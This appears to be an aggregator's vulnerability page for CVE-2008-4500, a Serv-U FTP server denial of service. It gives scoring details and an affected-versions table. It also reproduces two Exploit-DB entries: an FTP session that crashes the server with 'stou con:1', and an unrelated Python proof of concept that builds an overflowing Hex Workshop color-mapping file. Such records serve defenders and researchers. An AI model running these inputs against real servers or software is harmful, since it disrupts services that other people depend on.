CVE-2008-4500
published 2008-10-09CVE-2008-4500: Serv-U 7.0.0.1 through 7.3, including 7.2.0.1, allows remote authenticated users to cause a denial of service (CPU consumption) via a crafted stou command…
PriorityP420medium4CVSS 2.0
AVNACLAuSCNINAP
EXPLOIT
EPSS
10.25%
95.1th percentile
Serv-U 7.0.0.1 through 7.3, including 7.2.0.1, allows remote authenticated users to cause a denial of service (CPU consumption) via a crafted stou command, probably related to MS-DOS device names, as demonstrated using "con:1".
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
| solarwinds | serv-u_file_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Hex Workshop 5.1.4 - Color Mapping File Local Buffer Overflow (PoC)
exploitdb·2008-12-28
CVE-2008-5756 Hex Workshop 5.1.4 - Color Mapping File Local Buffer Overflow (PoC)
Hex Workshop 5.1.4 - Color Mapping File Local Buffer Overflow (PoC)
---
# Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow Poc
# other versions are affected
#
# By:Encrypt3d.M!nd
# Merry Christmas & Happy New Year 2009
#
# Greetz:-=Mizo=-(Perra :-l),L!0N,El Mariachi,MiNi SpIder,GGY,and all my friends
################################################################################
#
# Just import (enc.cmap) From (Tools>Color Mapping) And See What Happen ^_^
# I Think it's Easy To Exploit but need some work *_^
chars = "A"*4500
foot = "\x20\x3D\x20\x52\x47\x42\x28\x30\x2C\x20\x30\x2C\x20\x30\x29\x2C\x20\x52\x47\x42\x28\x31\x36\x30\x2C\x20\x31\x36\x30\x2C\x20\x31\x36\x30\x29"
file=open('enc.cmap','w+')
file.write("\x22"+chars+"\x22"+foot)
file.close()
# milw0rm.com [2008-12
Exploit-DB
RhinoSoft Serv-U FTP Server 7.3 - (Authenticated) 'stou con:1' Denial of Service
exploitdb·2008-10-03
CVE-2008-4500 RhinoSoft Serv-U FTP Server 7.3 - (Authenticated) 'stou con:1' Denial of Service
RhinoSoft Serv-U FTP Server 7.3 - (Authenticated) 'stou con:1' Denial of Service
---
#Serv-U <= 7.2.0.1 / 7.3 ftp server DoS
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.3 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
stou con:1
quit
221 Goodbye, closing session.
# now server DoS'ed
# milw0rm.com [2008-10-03]
No writeups or analysis indexed.
http://secunia.com/advisories/32150http://securityreason.com/securityalert/4377http://www.securityfocus.com/bid/31556http://www.vupen.com/english/advisories/2008/2746https://exchange.xforce.ibmcloud.com/vulnerabilities/45652https://www.exploit-db.com/exploits/6660http://secunia.com/advisories/32150http://securityreason.com/securityalert/4377http://www.securityfocus.com/bid/31556http://www.vupen.com/english/advisories/2008/2746https://exchange.xforce.ibmcloud.com/vulnerabilities/45652https://www.exploit-db.com/exploits/6660
2008-10-09
Published